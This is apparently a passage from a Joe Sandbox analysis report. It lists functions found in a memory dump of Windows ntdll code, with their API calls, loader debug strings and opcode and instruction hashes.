RtlDebugPrintTimes.210A(?,?,?,000000FE,?,?,?,?,7270C3F8,000000FE), ref: 7270D40E
RtlReleaseSRWLockExclusive.210A(?,000000FE,?,?,?), ref: 7270D46A
RtlReleaseSRWLockShared.210A(?,000000FE,?,?,?), ref: 7270D471
RtlReleaseSRWLockShared.210A(?,000000FE,?,?,?), ref: 7270D483

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Lock$ReleaseShared$AcquireExclusive$DebugPrintTimes
String ID:
API String ID: 675604559-0
Opcode ID: f865d96f4c31e895e4a04c25e8b2e130407895fa3aab34b5fc35d948a09b4878
Instruction ID: cfba0b6c3dcc45c7969292d968c630f65b10103fb74529d42fea5f6946783168
Opcode Fuzzy Hash: f865d96f4c31e895e4a04c25e8b2e130407895fa3aab34b5fc35d948a09b4878
Instruction Fuzzy Hash: 6051E272A003599BCB21CFADCAC075EFBF5EF45328F154659E816A7281C770E94ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 7264A220, Relevance: 9.2, APIs: 6, Instructions: 155memoryCOMMON

Download Yara Rule

APIs

RtlCreateMemoryZone.210A(?,00001002,00000000), ref: 7264A2D7
RtlAllocateMemoryZone.210A(?,0000000B,?,?,00001002,00000000), ref: 7264A2F0
RtlCreateMemoryZone.210A(?,?,00000000,?,0000000B,?,?,00001002,00000000), ref: 7264A312
memset.210A(?,00000000,?,?,?,00000000,?,0000000B,?,?,00001002,00000000), ref: 7264A328

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: MemoryZone$Create$Allocatememset
String ID:
API String ID: 3402925209-0
Opcode ID: b40676af71bca219f63d944bb4c97326270d063bf4a0617aaf62f1187659228e
Instruction ID: d624ecef723cc276935bf6f62d3f0e722928186792d443ce683238ba656cfa04
Opcode Fuzzy Hash: b40676af71bca219f63d944bb4c97326270d063bf4a0617aaf62f1187659228e
Instruction Fuzzy Hash: C851D772A002199BDB06CF6CC89079FB7F5AF84304F15517BD956EB285EB30DE108B90

Uniqueness

Uniqueness Score: -1.00%

Function 72657216, Relevance: 9.1, APIs: 6, Instructions: 99memorythreadCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,000000A8,727384D8,00000000,01000000,00000000,?,726573D0,?,00000000,00000000), ref: 7265723A
RtlAllocateHeap.210A(?,0000002C,?,000000A8,727384D8,00000000,01000000,00000000,?,726573D0,?,00000000,00000000), ref: 72657261
RtlIsCriticalSectionLockedByThread.210A(727352D8,?,0000002C,?,000000A8,727384D8,00000000,01000000,00000000), ref: 726572F6
RtlGetActiveActivationContext.210A(00000048,?,0000002C,?,000000A8,727384D8,00000000,01000000,00000000), ref: 72657309
RtlAddRefActivationContext.210A(00000000,?,0000002C,?,000000A8,727384D8,00000000,01000000,00000000), ref: 7265731B
RtlFreeHeap.210A(00000000,00000000,?,0000002C,?,000000A8,727384D8,00000000,01000000,00000000,?,726573D0,?,00000000,00000000), ref: 726AA5DF

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Heap$ActivationAllocateContext$ActiveCriticalFreeLockedSectionThread
String ID:
API String ID: 2337060208-0
Opcode ID: d45c6be22f85c4f4b6bedfbe19d1424db69a01ae7dd9d9129572d8df7dbcd921
Instruction ID: 8964885951de198109a67579346278a91618e81724b838aca1026851c6e390fb
Opcode Fuzzy Hash: d45c6be22f85c4f4b6bedfbe19d1424db69a01ae7dd9d9129572d8df7dbcd921
Instruction Fuzzy Hash: F83166B26113429FD322CF6ECA81B52BBF5EF05325F50442FEA4A9B691D7B0E901CB54

Uniqueness

Uniqueness Score: -1.00%

Function 726452F0, Relevance: 9.1, APIs: 6, Instructions: 91timeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(727385F0), ref: 72645332
RtlClearBits.210A(?,?,00000001,727385F0), ref: 7264535E
RtlAcquireSRWLockExclusive.210A(?,?,?,00000001,727385F0), ref: 72645377

Part of subcall function 72661ED0: RtlDllShutdownInProgress.210A(00000000), ref: 72661F0A
Part of subcall function 72661ED0: ZwWaitForAlertByThreadId.210A(?,00000000,?,?,?,?,?,?,?,00000000), ref: 72661FF3

RtlReleaseSRWLockExclusive.210A(?,?,?,?,00000001,727385F0), ref: 726453C2
RtlReleaseSRWLockExclusive.210A(727385F0,727385F0), ref: 726453D0
RtlDebugPrintTimes.210A(?,?,?,?,00000001,727385F0), ref: 726453F2

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$AlertBitsClearDebugPrintProgressShutdownThreadTimesWait
String ID:
API String ID: 3225401293-0
Opcode ID: e988e62c60d7cc59b031ac88034daef4db49923c3d6fda275a8c752949cd40f9
Instruction ID: f9f7d4dd4246ea3498b158ae5c532fa92445821f8259750143160882722a64d5
Opcode Fuzzy Hash: e988e62c60d7cc59b031ac88034daef4db49923c3d6fda275a8c752949cd40f9
Instruction Fuzzy Hash: F831E172605301DFC701CF6CC4C0A5A77A5AF61718F85186EEC829F28ADF70EA05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 7267F604, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108libraryCOMMON

Download Yara Rule

APIs

RtlAppendUnicodeToString.210A(02BE0000,?), ref: 7267F676

Part of subcall function 72659980: memmove.210A(00000000,00000050,00000052,?,00000000,00000000,?,?,72659438,00000000,\REGISTRY\USER\,?,00020019,?,?,000000FA), ref: 726599D2

LdrStandardizeSystemPath.210A(02BE0000,02BE0000,?), ref: 7267F684

Part of subcall function 726598B0: RtlGetNtSystemRoot.210A(01000000,00000000), ref: 726598E0
Part of subcall function 726598B0: RtlAppendUnicodeToString.210A(02140000,00000000,01000000,00000000), ref: 726598ED
Part of subcall function 726598B0: RtlAppendUnicodeToString.210A(02140000,\SysWOW64,02140000,00000000,01000000,00000000), ref: 72659905
Part of subcall function 726598B0: RtlPrefixUnicodeString.210A(02140000,00000002,00000001,02140000,\SysWOW64,02140000,00000000,01000000,00000000), ref: 72659914

Part of subcall function 7267F6FF: RtlGetNtSystemRoot.210A(?,?,?,?,?,7267F696,02BE0000,02BE0000,?), ref: 7267F70C
Part of subcall function 7267F6FF: _wcsnicmp.210A(?,00000000,-00000002,?,?,?,?,?,7267F696,02BE0000,02BE0000,?), ref: 7267F73E

Strings

\Windows, xrefs: 726BB90A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: StringUnicode$AppendSystem$Root$PathPrefixStandardize_wcsnicmpmemmove
String ID: \Windows
API String ID: 1616562977-3600636569
Opcode ID: 5f371e60dfdf9d64d6b618b872ed79645c2da059c6589990f59285036be081ca
Instruction ID: 8c06883581b7ed59fabd8e06167532cf07524841107956a613ea7814374d3cc4
Opcode Fuzzy Hash: 5f371e60dfdf9d64d6b618b872ed79645c2da059c6589990f59285036be081ca
Instruction Fuzzy Hash: CE31AE329083419FC715DF2DD880A8BBBE5BFC8214F25492FE89997394EB34D905CB86

Uniqueness

Uniqueness Score: -1.00%

Function 7264C529, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

RtlImageDirectoryEntryToData.210A(?,00000001,00000000,00000000,00000000,727352D8,00000000,00000000,00000000,?), ref: 7264C544

Strings

Loading procedure 0x%lx by ordinal, xrefs: 7269F1CF
Locating procedure "%s" by name, xrefs: 7269F19F
LdrpGetProcedureAddress, xrefs: 7269F1A6, 7269F1D6
minkernel\ntdll\ldrsnap.c, xrefs: 7269F1B0, 7269F1E0

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: DataDirectoryEntryImage
String ID: LdrpGetProcedureAddress$Loading procedure 0x%lx by ordinal$Locating procedure "%s" by name$minkernel\ntdll\ldrsnap.c
API String ID: 2408702995-1306472389
Opcode ID: e74144d4d9436d37129c2c2171f58c6dc2918fe9eebfd25d5fe4f9addfb308c6
Instruction ID: b8224e4e17e041c903684490a1ed0c7ea7d582d2de2fda34ce8370007cf7980d
Opcode Fuzzy Hash: e74144d4d9436d37129c2c2171f58c6dc2918fe9eebfd25d5fe4f9addfb308c6
Instruction Fuzzy Hash: D521D531700656AFE7168A5DCC41F5A7BA5EB84314F05022BEC81EB7C5DB21EE618BE4

Uniqueness

Uniqueness Score: -1.00%

Function 72654008, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 89threadCOMMON

Download Yara Rule

APIs

RtlIsCriticalSectionLockedByThread.210A(727352D8,?,apphelp.dll,00000000,?,?,72669A49,?,00000000,?,?,apphelp.dll,?,?,7271F730,00000020), ref: 7265401C

Strings

Failed to load for appcompat reasons, xrefs: 726A925E
apphelp.dll, xrefs: 7265400F
LdrpPrepareModuleForExecution, xrefs: 726A9265
minkernel\ntdll\ldrsnap.c, xrefs: 726A926F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalLockedSectionThread
String ID: Failed to load for appcompat reasons$LdrpPrepareModuleForExecution$apphelp.dll$minkernel\ntdll\ldrsnap.c
API String ID: 3632441385-306071505
Opcode ID: 9d480f9f97f72bb13fc95380102c39f5a95158719dd153aaf3f195e27d9c0b85
Instruction ID: 186066494f051580faf0d9eb017d0f3861f0b31ab7b6f257eea1adc8d2cd1e02
Opcode Fuzzy Hash: 9d480f9f97f72bb13fc95380102c39f5a95158719dd153aaf3f195e27d9c0b85
Instruction Fuzzy Hash: E421B171B042C25BD3168F6FC984B657BA5EF41318F7042ABE8069BAC9DB61EC0186D4

Uniqueness

Uniqueness Score: -1.00%

Function 7267A6B3, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

RtlImageDirectoryEntryToData.210A(?,00000001,00000005,?,00000000,00000000,7FFE0385,?,?,72656EAA,?,00000024), ref: 7267A6E3

Strings

Status: 0x%08lx, xrefs: 726B95D9
minkernel\ntdll\ldrmap.c, xrefs: 726B958F, 726B95EA
DLL name: %wZ, xrefs: 726B957E
LdrpRelocateImage, xrefs: 726B9585, 726B95E0

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: DataDirectoryEntryImage
String ID: DLL name: %wZ$LdrpRelocateImage$Status: 0x%08lx$minkernel\ntdll\ldrmap.c
API String ID: 2408702995-758838006
Opcode ID: 385ada6ed48aa523507ea20fe60ff0a02a1f008e873d53c1520c61cfeec52e58
Instruction ID: c7446d132eefd11b4a9434481f1e665dd1e3742000b283bbee025247955a866d
Opcode Fuzzy Hash: 385ada6ed48aa523507ea20fe60ff0a02a1f008e873d53c1520c61cfeec52e58
Instruction Fuzzy Hash: CC115C32B4124676E312A51D9D00F8A7B9D9F40756F204217FE012A3C5E7B0EE818FE9

Uniqueness

Uniqueness Score: -1.00%

Function 726DF7BA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT(?,00000000,FF676980,000000FF,00000000,00000000,?,?,?,726A078C,00000000,00000004,?,00000000,?,00000000), ref: 726DF7DA
DbgPrintEx.210A(00000065,00000001,RTL: Enter CriticalSection Timeout (%I64u secs) %d,00000000,?,?,00000000,FF676980,000000FF,00000000,00000000,?,?,?,726A078C,00000000), ref: 726DF7EA
DbgPrintEx.210A(00000065,00000000,RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u,?,?,00000002,?,00000000,00000004,?,00000000,?,00000000,00000000), ref: 726DF814

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 726DF80B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 726DF7E1

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 545360701-3903918235
Opcode ID: 863a7da15c5b2ca544ec1a5014135e773acf80e9e62f81d49723ea65772c462a
Instruction ID: a0804b6c19d4031a8917564bc920772ad17e339a7f01eb7fee43fabb862f321a
Opcode Fuzzy Hash: 863a7da15c5b2ca544ec1a5014135e773acf80e9e62f81d49723ea65772c462a
Instruction Fuzzy Hash: 83F0F6726001057FEA220A59DC02F63BF6AEF44730F240356F6285A5E1DA62FC20D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 7264A010, Relevance: 8.0, APIs: 5, Instructions: 456COMMON

Download Yara Rule

APIs

RtlpCreateProcessRegistryInfo.210A(?), ref: 7264A0D9
RtlGetSystemPreferredUILanguages.210A(00000000,00000000,?,?,?,?,?,?,?,00000001,?,00000000,00000000,00000000,?,?), ref: 726A4FA4

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CreateInfoLanguagesPreferredProcessRegistryRtlpSystem
String ID:
API String ID: 3557058149-0
Opcode ID: 88840defd90befa58292dc62cc5b9f5da204710933e9a7897ab7d2ab3c72b0bf
Instruction ID: b504fa8ccffc7ae490ef3cb19016e38163a01a714cf73d362b60b73910d6f96b
Opcode Fuzzy Hash: 88840defd90befa58292dc62cc5b9f5da204710933e9a7897ab7d2ab3c72b0bf
Instruction Fuzzy Hash: 17F180716083419FD715CF18C8A0A5BBBF5BF88718F04891EF9969B290DB34DD45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 72669440, Relevance: 7.9, APIs: 5, Instructions: 359COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d47e301c324d84c6986be99958533ed801b64549962d6038c83a20b3af80ac6
Instruction ID: 320da9a1f022bf426c7513b24c276990652f604a59ff2225c8660a9e1e5fc8c6
Opcode Fuzzy Hash: 1d47e301c324d84c6986be99958533ed801b64549962d6038c83a20b3af80ac6
Instruction Fuzzy Hash: FBD16B35D012298BCB11DF9DC580ABDBBB2FF44714F65441BDC86AB2C8E735A986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 726411B0, Relevance: 7.7, APIs: 5, Instructions: 151COMMON

Download Yara Rule

APIs

RtlIpv4StringToAddressW.210A(00000000,?,?,00000000), ref: 726411D9

Part of subcall function 72641200: iswctype.210A(0000000A,00000004), ref: 72641264

iswctype.210A(00000000,00000004,00000000,?,?,00000000), ref: 7269F8DB

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: iswctype$AddressIpv4String
String ID:
API String ID: 1627499474-0
Opcode ID: e9e63beba6063e5ce5d070b42df71a2aaeb6e0d9ce2ee18fbacff9a5b69bb63f
Instruction ID: 4917b7e8a68a23587953719cc0e768b5551b77d562449bb98da6dca94a6e3cc9
Opcode Fuzzy Hash: e9e63beba6063e5ce5d070b42df71a2aaeb6e0d9ce2ee18fbacff9a5b69bb63f
Instruction Fuzzy Hash: 41411573600215ABE7198B9CDC417A977B5EF44768FB0552BE882E72C0EB38DB42D254

Uniqueness

Uniqueness Score: -1.00%

Function 7267E706, Relevance: 7.6, APIs: 5, Instructions: 103COMMON

Download Yara Rule

APIs

Part of subcall function 7267E750: RtlAcquireSRWLockExclusive.210A(727386AC,00000000,00000000,00000000,0000000C,?,7267E72F,00000000,00000000,?), ref: 7267E761
Part of subcall function 7267E750: RtlReleaseSRWLockExclusive.210A(727386AC,?,?,727386AC,00000000,00000000,00000000,0000000C,?,7267E72F,00000000,00000000,?), ref: 7267E78B

RtlAcquireSRWLockShared.210A(0000001C,00000000,00000000,?), ref: 726BB212
RtlReleaseSRWLockShared.210A(0000001C,0000001C,00000000,00000000,?), ref: 726BB2A0

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Lock$AcquireExclusiveReleaseShared
String ID:
API String ID: 3474408661-0
Opcode ID: cb27f4585c72668f540d255158bcae37155d97bc38297175f6c24d459b9d7282
Instruction ID: 70820b0ce4d653e248aaa46e429244e3a54606780aa71d467bb7ccce9003c59a
Opcode Fuzzy Hash: cb27f4585c72668f540d255158bcae37155d97bc38297175f6c24d459b9d7282
Instruction Fuzzy Hash: 1131C475D00258CACB11DF6CC8817FDBBB4AF44304F5480ABDD49AB286DA75598ACB98

Uniqueness

Uniqueness Score: -1.00%

Function 7265541D, Relevance: 7.6, APIs: 5, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

memcmp.210A(?,0000002C,00000010,?,00000000,00000000,00001000,00000000,?,00000000,?,00001000,00000001,?,00000000,02BE0000), ref: 7265547E
_wcsicmp.210A(00000000,?), ref: 72655497
LdrResGetRCConfig.210A(?,00000000,?,00001000,00000001,?,00000000,02BE0000), ref: 726554B4
LdrResGetRCConfig.210A(?,00000000,00000000,00001000,00000000,?,00000000,?,00001000,00000001,?,00000000,02BE0000), ref: 726554C5

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Config$_wcsicmpmemcmp
String ID:
API String ID: 3637063145-0
Opcode ID: 40e4af57acdac95f9b8a4a8de1944ccb52907ddf2418cd0f9f4a006a3edc4c62
Instruction ID: bd53c826c661ebd48c0c3a0d1ac7b46f5f937f5a3780cec71f915e6a18edbe88
Opcode Fuzzy Hash: 40e4af57acdac95f9b8a4a8de1944ccb52907ddf2418cd0f9f4a006a3edc4c62
Instruction Fuzzy Hash: E831B471A00208BBDB118AAEDD48B9F7BBCDF40359F10406BF906A71C8E670DE15C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 7270B453, Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

RtlReleaseSRWLockExclusive.210A(?,727379A0,00000000,?,7265017A,?,727379A0,?,00000000,?,?,?,726A7019,?,00000000,?), ref: 7270B4B5
RtlReleaseSRWLockExclusive.210A(?,?,727379A0,00000000,?,7265017A,?,727379A0,?,00000000,?,?,?,726A7019,?,00000000), ref: 7270B4C5
RtlReleaseSRWLockExclusive.210A(?,?,?,727379A0,00000000,?,7265017A,?,727379A0,?,00000000,?,?,?,726A7019,?), ref: 7270B4D5
RtlReleaseSRWLockExclusive.210A(00000000,?,?,?,727379A0,00000000,?,7265017A,?,727379A0,?,00000000,?,?,?,726A7019), ref: 7270B4EB
RtlReleaseSRWLockExclusive.210A(?,727379A0,00000000,?,7265017A,?,727379A0,?,00000000,?,?,?,726A7019,?,00000000,?), ref: 7270B4F7

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLockRelease
String ID:
API String ID: 1766480654-0
Opcode ID: d8c248b1519da545fe53be9f40e6a392307e419c079c2c4907db463c94195abb
Instruction ID: d8a4ce859dff6513680c97fecee8cef115184520bfb164007060b57aaf055a44
Opcode Fuzzy Hash: d8c248b1519da545fe53be9f40e6a392307e419c079c2c4907db463c94195abb
Instruction Fuzzy Hash: A4114F71510B428AD335CF6EC580B93F7EAEFD9314B00C82AE58B87655DB35B60A8B64

Uniqueness

Uniqueness Score: -1.00%

Function 7270B244, Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(?,727379A0,?,00000000,?,?,726A73BC,?,?,?,?,7264FCF3,?,727379A0), ref: 7270B27B
RtlAcquireSRWLockExclusive.210A(?,?,727379A0,?,00000000,?,?,726A73BC,?,?,?,?,7264FCF3,?,727379A0), ref: 7270B291
RtlAcquireSRWLockExclusive.210A(?,?,?,727379A0,?,00000000,?,?,726A73BC,?,?,?,?,7264FCF3,?,727379A0), ref: 7270B2A1
RtlAcquireSRWLockExclusive.210A(?,?,?,?,727379A0,?,00000000,?,?,726A73BC,?,?,?,?,7264FCF3,?), ref: 7270B2B4
RtlAcquireSRWLockExclusive.210A(?,?,?,?,?,727379A0,?,00000000,?,?,726A73BC,?,?,?,?,7264FCF3), ref: 7270B2C4

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AcquireExclusiveLock
String ID:
API String ID: 4021432409-0
Opcode ID: ee88c93e77c76d661eaf3e1a377f3bd560dd8c70649f07ac4caea4fd93971e48
Instruction ID: 1ee6d02c828d1562cd633aad3f28b9508ad7d8866315144c1b1fd555b6294525
Opcode Fuzzy Hash: ee88c93e77c76d661eaf3e1a377f3bd560dd8c70649f07ac4caea4fd93971e48
Instruction Fuzzy Hash: 89119471600B448BC331DFADC580F9BB7E9EF49360B045A5ED4ABC3680D760F9498794

Uniqueness

Uniqueness Score: -1.00%

Function 726413B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

Part of subcall function 726417A3: RtlAcquireSRWLockExclusive.210A(?,726413E0,7271EC78,00000044), ref: 726417B3

RtlReleaseSRWLockExclusive.210A(?,7271EC78,00000044), ref: 72641482

Part of subcall function 726419A6: RtlIsValidIndexHandle.210A(?,?,00000000,?,?,72641412,7271EC78,00000044), ref: 726419B5

memcpy.210A(?,0000000E,?,7271EC78,00000044), ref: 7264145D

Strings

#%u, xrefs: 7269FC01

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireHandleIndexReleaseValidmemcpy
String ID: #%u
API String ID: 1422088098-232158463
Opcode ID: 9a14311423cc82ffbd2f46de2d28a6018941a859dee6411bc2e50fb863234309
